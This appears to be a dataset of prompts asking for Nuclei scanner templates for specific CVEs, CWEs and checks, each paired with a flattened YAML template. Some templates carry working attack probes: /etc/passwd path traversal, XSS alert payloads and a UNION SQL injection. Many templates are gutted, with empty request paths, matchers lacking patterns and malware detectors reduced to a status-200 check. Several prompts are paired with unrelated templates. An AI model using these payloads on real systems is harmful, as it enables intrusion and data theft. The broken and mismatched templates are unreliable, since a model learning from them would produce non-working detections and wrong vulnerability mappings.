id: turla-malware-hash info: name: Turla APT Malware - Detect author: pussycat0x severity: info description: Detects Turla malware based on sample used in the RUAG APT case tags: malware,turla,apt,ruag http: - method: GET path: - "/" matchers: - type: status status: - 200
generic
info
turla-malware-hash
Generate a Nuclei template for CVE-2022-2486
Title: OS Command Injection in wavlink wl-wn535k2_firmware and others Summary: A vulnerability, which was classified as critical, was found in WAVLINK WN535K2 and WN535K3. This affects an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade. The manipulation of the argument key leads to os command injection. The exploit has been disclosed to the public and may be used. Vulnerability Type: OS Command Injection Severity: high Affected Products: wavlink wl-wn535k2_firmware, wavlink wl-wn535k3_firmware Indicators: error, vulnerability detected
id: CVE-2022-2486 info: name: Wavlink WN535K2/WN535K3 - OS Command Injection author: For3stCo1d severity: critical description: Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection in an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade via manipulation of the argument key. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. tags: cve2022,cve,iot,wavlink,router,rce,oast,vkev,vuln http: - method: GET path: matchers: - type: word words: - "http" part: interactsh_protocol - type: status status: - 500
cve
high
CVE-2022-2486
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: ogugg info: name: Ogu.gg User Name Information - Detect author: dwisiswant0 severity: info description: Ogu.gg user name information check was conducted. tags: osint,osint-social,ogugg,discovery http: - method: GET path: - "https://ogu.gg/{{user}}" matchers: - type: status status: - 200 - type: word words: - "Username History" part: body
cwe
medium
CWE-200
Generate a Nuclei template for CVE-2020-8656
Title: SQL Injection in eyesofnetwork eyesofnetwork Summary: An issue was discovered in EyesOfNetwork 5.3. The EyesOfNetwork API 2.4.2 is prone to SQL injection, allowing an unauthenticated attacker to perform various tasks such as authentication bypass via the username field to getApiKey in include/api_functions.php. Vulnerability Type: SQL Injection Severity: critical Affected Products: eyesofnetwork eyesofnetwork Indicators: error, vulnerability detected
id: CVE-2020-8656 info: name: EyesOfNetwork - Hardcoded API Key & SQL Injection author: ritikchaddha severity: critical description: An issue was discovered in EyesOfNetwork 5.3. The EyesOfNetwork API 2.4.2 is prone to SQL injection, allowing an unauthenticated attacker to perform various tasks such as authentication bypass via the username field to getApiKey in include/api_functions.php. tags: cve,cve2020,eyesofnetwork,hardcoded-key,sqli,vuln,vkev http: - method: GET path: matchers: - type: dsl condition: and - type: dsl condition: and
cve
critical
CVE-2020-8656
Generate a Nuclei template for: Remove Expired SSL/TLS Certificates in AWS IAM
Title: Remove Expired SSL/TLS Certificates in AWS IAM Summary: Remove Expired SSL/TLS Certificates in AWS IAM. Checks for expired SSL/TLS certificates from AWS IAM Vulnerability Type: Security Check Severity: high Indicators: vulnerability detected
id: iam-expired-ssl info: name: Remove Expired SSL/TLS Certificates in AWS IAM author: princechaddha severity: high description: Checks for expired SSL/TLS certificates from AWS IAM tags: cloud,devops,aws,amazon,iam,ssl,aws-cloud-config http: - method: GET path: - "/" matchers: - type: status status: - 200
generic
high
iam-expired-ssl
Generate a Nuclei template for: NPM Anonymous CLI Metrics Exposure
Title: NPM Anonymous CLI Metrics Exposure Summary: NPM Anonymous CLI Metrics Exposure. Tags: exposure, npm, config Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: npm-anonymous-cli info: name: NPM Anonymous CLI Metrics Exposure author: DhiyaneshDK severity: info description: NPM Anonymous CLI Metrics Exposure tags: exposure,npm,config,files,vuln http: - method: GET path: - "{{BaseURL}}/.npm/anonymous-cli-metrics.json" - "{{BaseURL}}/anonymous-cli-metrics.json" matchers: - type: word words: - ""metricId":" - ""metrics":" - ""successfulInstalls":" part: body condition: and - type: word words: - "application/json" part: header
generic
info
npm-anonymous-cli
Generate a Nuclei template for: CPAS Management System - SQL Injection
Title: CPAS Management System - SQL Injection Summary: CPAS Management System - SQL Injection. The CPAS Audit Management System V4 has been identified with an SQL injection vulnerability in the getCurserIfAllowLogin endpoint. This flaw allows unauthenticated remote attackers to exploit the system by injecting malicious SQL queries. Through this vulnerability, attackers can retrieve sensitive data from the database and, under high-privilege circumstances, upload malicious payloads such as web shells to the server. This could potentially lead to a ful Vulnerability Type: Security Check Severity: high Indicators: vulnerability detected
id: cpas-managment-sqli info: name: CPAS Management System - SQL Injection author: s4e-io severity: high description: The CPAS Audit Management System V4 has been identified with an SQL injection vulnerability in the getCurserIfAllowLogin endpoint. This flaw allows unauthenticated remote attackers to exploit the system by injecting malicious SQL queries. Through this vulnerability, attackers can retrieve sensitive data from the database and, under high-privilege circumstances, upload malicious payloads such as web shells to the server. This could potentially lead to a full compromise of the server's system. The vulnerability is triggered via a crafted HTTP POST request containing a malicious ygbh parameter, making it a critical issue that requires immediate remediation to protect the integrity of the system. tags: cpas,cms,sqli,time-based-sqli,vuln http: - method: GET path: matchers: - type: dsl - method: GET path: matchers: - type: dsl condition: and
generic
high
cpas-managment-sqli
Generate a Nuclei template for CVE-2019-17230
Title: Unknown Vulnerability in mageewp onetone Summary: includes/theme-functions.php in the OneTone theme through 3.0.6 for WordPress allows unauthenticated options changes. Vulnerability Type: Unknown Vulnerability Severity: medium Affected Products: mageewp onetone Indicators: error, vulnerability detected
id: CVE-2019-17230 info: name: WordPress OneTone theme <= 3.0.6 – Unauthenticated Options Changes author: daffainfo severity: medium description: includes/theme-functions.php in the OneTone theme through 3.0.6 for WordPress allows unauthenticated options changes. tags: cve,cve2019,wordpress,wp-theme,wp,onetone,vkev,vuln http: - method: GET path: matchers: - type: dsl condition: and - method: GET path: matchers: - type: dsl condition: and
cve
medium
CVE-2019-17230
Generate a Nuclei template for: SFTPGo Admin - Setup
Title: SFTPGo Admin - Setup Summary: SFTPGo Admin - Setup. SFTPGo Admin Password setup page has been exposed. Vulnerability Type: Security Check Severity: high Indicators: vulnerability detected
id: sftpgo-admin-setup info: name: SFTPGo Admin - Setup author: ritikchaddha severity: high description: SFTPGo Admin Password setup page has been exposed. tags: sftpgo,misconfig,setup,vuln http: - method: GET path: - "{{BaseURL}}/web/admin/setup" matchers: - type: word words: - "SFTPGo - Setup" - "SFTPGo you need to create an admin user" part: body condition: or - type: status status: - 200
generic
high
sftpgo-admin-setup
Generate a Nuclei template for CVE-2024-31848
Title: Path Traversal in CVE-2024-31848 Summary: A path traversal vulnerability exists in the Java version of CData API Server < 23.4.8844 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application. Vulnerability Type: Path Traversal Severity: critical Indicators: error, vulnerability detected
id: CVE-2024-31848 info: name: CData API Server < 23.4.8844 - Path Traversal author: pussycat0x severity: critical description: A path traversal vulnerability exists in the Java version of CData API Server < 23.4.8844 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application. tags: cve,cve2024,cdata,lfi,vuln http: - method: GET path: - "{{BaseURL}}/login.rst" matchers: - type: word words: - "<title>CData - API Server</title>" - method: GET path: matchers: - type: word words: - ""items":[{" - ":"true"" - "notifyemail" part: body condition: and - type: word words: - "application/json" part: header - type: status status: - 200
cve
critical
CVE-2024-31848
Generate a Nuclei template for: Newcapec - Remote Code Execution
Title: Newcapec - Remote Code Execution Summary: Newcapec - Remote Code Execution. Newcapec front-end service management platform service.action interface has a remote command execution vulnerability, attackers can use the vulnerability to obtain server permissions. Vulnerability Type: Security Check Severity: critical Indicators: vulnerability detected
id: newcapec-rce info: name: Newcapec - Remote Code Execution author: ritikchaddha severity: critical description: Newcapec front-end service management platform service.action interface has a remote command execution vulnerability, attackers can use the vulnerability to obtain server permissions. tags: newcapec,rce,intrusive,vuln http: - method: GET path: matchers: - type: dsl condition: and
generic
critical
newcapec-rce
Generate a Nuclei template for: OilRig Malware Campaign Gen1 Hash - Detect
Title: OilRig Malware Campaign Gen1 Hash - Detect Summary: OilRig Malware Campaign Gen1 Hash - Detect. Detects malware from OilRig Campaign Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: oilrig-malware-hash info: name: OilRig Malware Campaign Gen1 Hash - Detect author: pussycat0x severity: info description: Detects malware from OilRig Campaign tags: malware,oilrig,apt http: - method: GET path: - "/" matchers: - type: status status: - 200
generic
info
oilrig-malware-hash
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: modoboa-panel info: name: Modoboa Login Panel - Detect author: kh4sh3i severity: info description: Modoboa login panel was detected. tags: panel,modoboa,mail,discovery http: - method: GET path: - "{{BaseURL}}" - "{{BaseURL}}/accounts/login/?next=/" matchers: - type: word words: - "Welcome to Modoboa" part: body - type: status status: - 200
cwe
medium
CWE-200
Generate a Nuclei template for CVE-2020-13158
Title: Path Traversal in articatech artica_proxy Summary: Artica Proxy before 4.30.000000 Community Edition allows Directory Traversal via the fw.progrss.details.php popup parameter. Vulnerability Type: Path Traversal Severity: high Affected Products: articatech artica_proxy Indicators: error, vulnerability detected
id: CVE-2020-13158 info: name: Artica Proxy Community Edition <4.30.000000 - Local File Inclusion author: 0x_Akoko severity: high description: Artica Proxy Community Edition before 4.30.000000 is vulnerable to local file inclusion via the fw.progrss.details.php popup parameter. tags: cve,cve2020,artica,lfi,articatech,vkev,vuln http: - method: GET path: - "{{BaseURL}}/fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" matchers: - type: regex - type: status status: - 200
cve
high
CVE-2020-13158
Generate a Nuclei template for CVE-2023-3847
Title: Cross-Site Scripting (XSS) in moosocial moodating Summary: A vulnerability classified as problematic was found in mooSocial mooDating 1.2. This vulnerability affects unknown code of the file /users of the component URL Handler. The manipulation leads to cross site scripting. The attack can be initiated remotely. VDB-235198 is the identifier assigned to this vulnerability. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly. Vulnerability Type: Cross-Site Scripting (XSS) Severity: low Affected Products: moosocial moodating Indicators: error, vulnerability detected
id: CVE-2023-3847 info: name: MooDating 1.2 - Cross-Site scripting author: r3Y3r53 severity: medium description: A vulnerability classified as problematic was found in mooSocial mooDating 1.2. This vulnerability affects unknown code of the file /users of the component URL Handler. The manipulation leads to cross site scripting. The attack can be initiated remotely. tags: cve2023,cve,packetstorm,xss,moodating,moosocial,vuln http: - method: GET path: - "{{BaseURL}}/users/viewi1omd%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3el43yn/108?tab=activity" matchers: - type: dsl condition: and
cve
low
CVE-2023-3847
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: cerebro-panel info: name: Cerebro Login Panel - Detect author: huowuzhao,elder tao severity: info description: Cerebro login panel was detected. tags: panel,cerebro,discovery http: - method: GET path: - "{{BaseURL}}/login" matchers: - type: word words: - "<title>Cerebro</title>" part: body
cwe
medium
CWE-200
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: twitter info: name: Twitter User Name Information - Detect author: dwisiswant0 severity: info description: Twitter user name information check was conducted. tags: osint,osint-social,twitter,discovery http: - method: GET path: - "https://nitter.net/{{user}}" matchers: - type: status status: - 200 - type: word words: - "| nitter</title>" part: body
cwe
medium
CWE-200
Generate a Nuclei template for: Dynatrace API Token
Title: Dynatrace API Token Summary: Dynatrace API Token. Tags: dynatrace, token, exposure Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: dynatrace-api-token info: name: Dynatrace API Token author: DhiyaneshDK severity: info description: Dynatrace API Token tags: dynatrace,token,exposure,vuln http: - method: GET path: - "{{BaseURL}}" matchers: - type: status status: - 200
generic
info
dynatrace-api-token
Generate a Nuclei template for: Uniform Bucket-Level Access Not Enforced
Title: Uniform Bucket-Level Access Not Enforced Summary: Uniform Bucket-Level Access Not Enforced. Ensure that "Enforce uniform bucket-level access" policy is enabled for your Google Cloud Platform (GCP) organization in order to enforce uniform bucket-level access for all Google Cloud Storage buckets available in your organization. Enforcing uniform bucket-level access disables Access Control Lists (ACLs) for all Cloud Storage resources (buckets and objects) so that access is granted exclusively through Cloud IAM service. Vulnerability Type: Security Check Severity: medium Indicators: vulnerability detected
id: gcloud-org-uniform-bucket-access info: name: Uniform Bucket-Level Access Not Enforced author: princechaddha severity: medium description: Ensure that "Enforce uniform bucket-level access" policy is enabled for your Google Cloud Platform (GCP) organization in order to enforce uniform bucket-level access for all Google Cloud Storage buckets available in your organization. Enforcing uniform bucket-level access disables Access Control Lists (ACLs) for all Cloud Storage resources (buckets and objects) so that access is granted exclusively through Cloud IAM service. tags: cloud,devops,gcp,gcloud,resourcemanager,security,storage,bucket,gcp-cloud-config http: - method: GET path: - "/" matchers: - type: status status: - 200
generic
medium
gcloud-org-uniform-bucket-access
Generate a Nuclei template for CVE-2023-24733
Title: Cross-Site Scripting (XSS) in sigb pmb Summary: PMB v7.4.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the query parameter at /admin/convert/export_z3950_new.php. Vulnerability Type: Cross-Site Scripting (XSS) Severity: medium Affected Products: sigb pmb Indicators: error, vulnerability detected
id: CVE-2023-24733 info: name: PMB 7.4.6 - Cross-Site Scripting author: r3Y3r53 severity: medium description: PMB 7.4.6 contains a cross-site scripting vulnerability via the query parameter at /admin/convert/export_z3950_new.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. tags: cve,cve2023,unauth,xss,pmb,pmb_project,sigb,vkev,vuln http: - method: GET path: - "{{BaseURL}}/pmb/admin/convert/export_z3950_new.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or" matchers: - type: word words: - "3@1=<script>alert(document.domain)</script>@" part: body - type: word words: - "text/html" part: header - type: status status: - 200
cve
medium
CVE-2023-24733
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: linktree info: name: Linktree User Name Information - Detect author: dwisiswant0 severity: info description: Linktree user name information check was conducted. tags: osint,osint-social,linktree,discovery http: - method: GET path: - "https://linktr.ee/{{user}}" matchers: - type: status status: - 200 - type: word words: - "| Linktree" part: body
cwe
medium
CWE-200
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: social-msdn info: name: Social msdn User Name Information - Detect author: dwisiswant0 severity: info description: Social msdn user name information check was conducted. tags: osint,osint-social,social-msdn,discovery http: - method: GET path: - "https://social.msdn.microsoft.com/profile/{{user}}" matchers: - type: status status: - 200 - type: word words: - "Member Since" part: body
cwe
medium
CWE-200
Generate a Nuclei template to detect SQL Injection
Title: SQL Injection (CWE-89) Summary: The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. Vulnerability Type: SQL Injection Severity: critical Indicators: vulnerability detected, error
id: vbulletin-ajaxreg-sqli info: name: vBulletin 3.x / 4.x AjaxReg - SQL Injection author: mastercho severity: critical description: vBulletin versions 3.x and 4.x suffer from an AjaxReg remote blind SQL injection vulnerability. tags: time-based-sqli,packetstorm,vbulletin,ajaxreg,sqli,vuln http: - method: GET path: matchers: - type: dsl condition: and
cwe
critical
CWE-89
Generate a Nuclei template for: Getresponse Takeover Detection
Title: Getresponse Takeover Detection Summary: Getresponse Takeover Detection. Getresponse takeover was detected. Vulnerability Type: Security Check Severity: high Indicators: vulnerability detected
id: getresponse-takeover info: name: Getresponse Takeover Detection author: pdteam severity: high description: Getresponse takeover was detected. tags: takeover,getresponse,vuln http: - method: GET path: - "{{BaseURL}}" matchers: - type: dsl - type: word words: - "With GetResponse Landing Pages, lead generation has never been easier"
generic
high
getresponse-takeover
Generate a Nuclei template for CVE-2021-35587
Title: Vulnerability (CWE-306) in oracle access_manager Summary: Vulnerability in the Oracle Access Manager product of Oracle Fusion Middleware (component: OpenSSO Agent). Supported versions that are affected are 11.1.2.3.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Access Manager. Successful attacks of this vulnerability can result in takeover of Oracle Access Manager. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). Vulnerability Type: Vulnerability (CWE-306) Severity: critical Affected Products: oracle access_manager Indicators: error, vulnerability detected
id: CVE-2021-35587 info: name: Oracle Access Manager - Remote Code Execution author: cckuailong severity: critical description: The Oracle Access Manager portion of Oracle Fusion Middleware (component: OpenSSO Agent) is vulnerable to remote code execution. Supported versions that are affected are 11.1.2.3.0, 12.2.1.3.0 and 12.2.1.4.0. This is an easily exploitable vulnerability that allows unauthenticated attackers with network access via HTTP to compromise Oracle Access Manager. tags: cve2021,cve,oam,rce,java,unauth,oracle,kev,vkev,vuln http: - method: GET path: - "{{BaseURL}}/oam/server/opensso/sessionservice" matchers: - type: word words: - "x-oracle-dms-ecid" - "x-oracle-dms-rid" part: header condition: or - type: word words: - "/oam/pages/css/general.css" part: body - type: status status: - 200
cve
critical
CVE-2021-35587
Generate a Nuclei template to detect Use of Hard-coded Credentials
Title: Use of Hard-coded Credentials (CWE-798) Summary: The product contains hard-coded credentials, such as a password or cryptographic key. There are two main variations: Inbound: the product contains an authentication mechanism that checks the input credentials against a hard-coded set of credentials. In this variant, a default administration account is created, and a simple password is hard-coded into the product and associated with that account. This hard-coded password is the same for each installation of the product, and it usually cann Vulnerability Type: Use of Hard-coded Credentials Severity: high Indicators: vulnerability detected, error
id: chinaunicom-default-login info: name: China Unicom Modem Default Login author: princechaddha severity: high description: Default login credentials were discovered for a China Unicom modem. tags: chinaunicom,default-login,vuln http: - method: GET path: matchers: - type: status status: - 302 - type: word words: - "/menu.gch" part: header
cwe
high
CWE-798
Generate a Nuclei template for: JWay Products - Detect
Title: JWay Products - Detect Summary: JWay Products - Detect. JWay products was detected. Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: jway-products-detect info: name: JWay Products - Detect author: righettod severity: info description: JWay products was detected. tags: panel,jway,detect,discovery http: - method: GET path: - "{{BaseURL}}/generatedHomepage.html" matchers: - type: dsl condition: and
generic
info
jway-products-detect
Generate a Nuclei template for: Universal 1337 Stealer Malware - Detect
Title: Universal 1337 Stealer Malware - Detect Summary: Universal 1337 Stealer Malware - Detect. Tags: malware, file Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: universal-1337-malware info: name: Universal 1337 Stealer Malware - Detect author: daffainfo severity: info description: Universal 1337 Stealer Malware - Detect tags: malware,file http: - method: GET path: - "/" matchers: - type: status status: - 200
generic
info
universal-1337-malware
Generate a Nuclei template for: ElasticSearch - Default Login
Title: ElasticSearch - Default Login Summary: ElasticSearch - Default Login. Elasticsearch default credentials were discovered. Vulnerability Type: Security Check Severity: high Indicators: vulnerability detected
id: elasticsearch-default-login info: name: ElasticSearch - Default Login author: Mohammad Reza Omrani | @omranisecurity severity: high description: Elasticsearch default credentials were discovered. tags: default-login,elasticsearch,vuln http: - method: GET path: matchers: - type: word words: - "Set-Cookie: sid=" - "kbn-license-sig:" part: header condition: and - type: status status: - 200
generic
high
elasticsearch-default-login
Generate a Nuclei template for CVE-2021-42949
Title: Authentication Bypass in digitaldruid hoteldruid Summary: The component controlla_login function in HotelDruid Hotel Management Software v3.0.3 generates a predictable session token, allowing attackers to bypass authentication via bruteforce attacks. Vulnerability Type: Authentication Bypass Severity: critical Affected Products: digitaldruid hoteldruid Indicators: error, vulnerability detected
id: unauth-hoteldruid-panel info: name: Hoteldruid Management Panel Access author: princechaddha severity: high description: A vulnerability in Hoteldruid Panel allows remote unauthenticated users access to the management portal without authentication. tags: hoteldruid,panel,unauth,vuln http: - method: GET path: - "{{BaseURL}}/hoteldruid/inizio.php" - "{{BaseURL}}/inizio.php" matchers: - type: status status: - 200 - type: word words: - "<title> HotelDruid </title>" - "<b>INSERT:</b>" - "<b>TABLES:</b>" part: body condition: and
cve
critical
CVE-2021-42949
Generate a Nuclei template for: Ricoh Web Image Monitor - Detect
Title: Ricoh Web Image Monitor - Detect Summary: Ricoh Web Image Monitor - Detect. Ricoh Web Image Monitor device was detected. Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: ricoh-webimagemonitor-panel info: name: Ricoh Web Image Monitor - Detect author: righettod severity: info description: Ricoh Web Image Monitor device was detected. tags: panel,ricoh,detect,discovery http: - method: GET path: - "{{BaseURL}}/web/guest/en/websys/webArch/header.cgi" matchers: - type: dsl condition: and
generic
info
ricoh-webimagemonitor-panel
Generate a Nuclei template for: Forgejo Repositories - Exposure
Title: Forgejo Repositories - Exposure Summary: Forgejo Repositories - Exposure. The Forgejo repo is being exposed publically. Vulnerability Type: Security Check Severity: medium Indicators: vulnerability detected
id: forgejo-repo-exposure info: name: Forgejo Repositories - Exposure author: DhiyaneshDK severity: medium description: The Forgejo repo is being exposed publically. tags: misconfig,exposure,forgejo,vuln http: - method: GET path: - "{{BaseURL}}/explore/repos" matchers: - type: word words: - "Powered by Forgejo" - "Explore</a>" - "Repositories" part: body condition: and - type: status status: - 200
generic
medium
forgejo-repo-exposure
Generate a Nuclei template for: Audit Logging Disabled
Title: Audit Logging Disabled Summary: Audit Logging Disabled. Check if audit logging for critical events is disabled. Vulnerability Type: Security Check Severity: high Indicators: vulnerability detected
id: audit-logging-disabled info: name: Audit Logging Disabled author: princechaddha severity: high description: Check if audit logging for critical events is disabled. tags: windows,audit-logging,security,code,windows-audit http: - method: GET path: - "/" matchers: - type: status status: - 200
generic
high
audit-logging-disabled
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: hudsonrock info: name: HudsonRock User Name Information - Detect author: princechaddha,rxerium severity: info description: HudsonRock user name information check was conducted. tags: osint,osint-security,hudsonrock,discovery http: - method: GET path: - "https://cavalier.hudsonrock.com/api/json/v2/osint-tools/search-by-username?username={{user}}" matchers: - type: status status: - 200 - type: word words: - "This username is associated with a computer that was infected by an info-stealer" - "hudsonrock.com" part: body condition: and
cwe
medium
CWE-200
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: saracartershow info: name: SaraCarterShow User Name Information - Detect author: dwisiswant0 severity: info description: SaraCarterShow user name information check was conducted. tags: osint,osint-political,saracartershow,discovery http: - method: GET path: - "https://saraacarter.com/author/{{user}}/" matchers: - type: status status: - 200 - type: word words: - "| Sara A. Carter" part: body
cwe
medium
CWE-200
Generate a Nuclei template for: Bella Malware - Detect
Title: Bella Malware - Detect Summary: Bella Malware - Detect. Tags: malware, file, macos-bella Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: macos-bella-malware info: name: Bella Malware - Detect author: daffainfo severity: info description: Bella Malware - Detect tags: malware,file,macos-bella http: - method: GET path: - "/" matchers: - type: status status: - 200
generic
info
macos-bella-malware
Generate a Nuclei template for CVE-2022-38812
Title: SQL Injection in aerocms_project aerocms Summary: AeroCMS 0.1.1 is vulnerable to SQL Injection via the author parameter. Vulnerability Type: SQL Injection Severity: medium Affected Products: aerocms_project aerocms Indicators: error, vulnerability detected
id: CVE-2022-38812 info: name: AeroCMS 0.1.1 - SQL Injection author: shivampand3y severity: medium description: AeroCMS 0.1.1 contains a SQL injection caused by unsanitized author parameter, letting attackers execute arbitrary SQL commands, exploit requires crafted author input. tags: cve,cve2022,aero,cms,sqli,edb,vuln http: - method: GET path: - "{{BaseURL}}/author_posts.php?author=admin%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5({{num}}),1,1),NULL,NULL,NULL,NULL--%20-&p_id=1" - "{{BaseURL}}/cms/author_posts.php?author=admin%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5({{num}}),1,1),NULL,NULL,NULL,NULL--%20-&p_id=1" matchers: - type: word words: - "{{md5(num)}}" part: body - type: status status: - 200
cve
medium
CVE-2022-38812
Generate a Nuclei template for: netlify takeover detection
Title: netlify takeover detection Summary: netlify takeover detection. netlify takeover was detected. Vulnerability Type: Security Check Severity: high Indicators: vulnerability detected
id: netlify-takeover info: name: netlify takeover detection author: 0xPrial,pdteam severity: high description: netlify takeover was detected. tags: takeover,netlify,vuln http: - method: GET path: - "{{BaseURL}}" matchers: - type: dsl - type: word words: - "Not Found - Request ID:" part: body - type: word words: - "Netlify" part: header
generic
high
netlify-takeover
Generate a Nuclei template for: SAP Internet Graphics Server (IGS) Detection
Title: SAP Internet Graphics Server (IGS) Detection Summary: SAP Internet Graphics Server (IGS) Detection. Detection of SAP Internet Graphics Server (IGS) Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: sap-igs-detect info: name: SAP Internet Graphics Server (IGS) Detection author: _generic_human_ severity: info description: Detection of SAP Internet Graphics Server (IGS) tags: sap,tech,igs,discovery http: - method: GET path: - "{{BaseURL}}" matchers: - type: word words: - "SAP IGS" - "is running" part: body condition: and - type: status status: - 200 - type: word words: - "SAP Internet Graphics Server" part: header
generic
info
sap-igs-detect
Generate a Nuclei template for CVE-2010-1312
Title: Path Traversal in ijoomla com_news_portal Summary: Directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. Vulnerability Type: Path Traversal Severity: medium Affected Products: ijoomla com_news_portal Indicators: error, vulnerability detected
id: CVE-2010-1312 info: name: Joomla! Component News Portal 1.5.x - Local File Inclusion author: daffainfo severity: medium description: A directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. tags: cve2010,cve,joomla,lfi,edb,packetstorm,ijoomla,vuln http: - method: GET path: - "{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00" matchers: - type: regex - type: status status: - 200
cve
medium
CVE-2010-1312
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
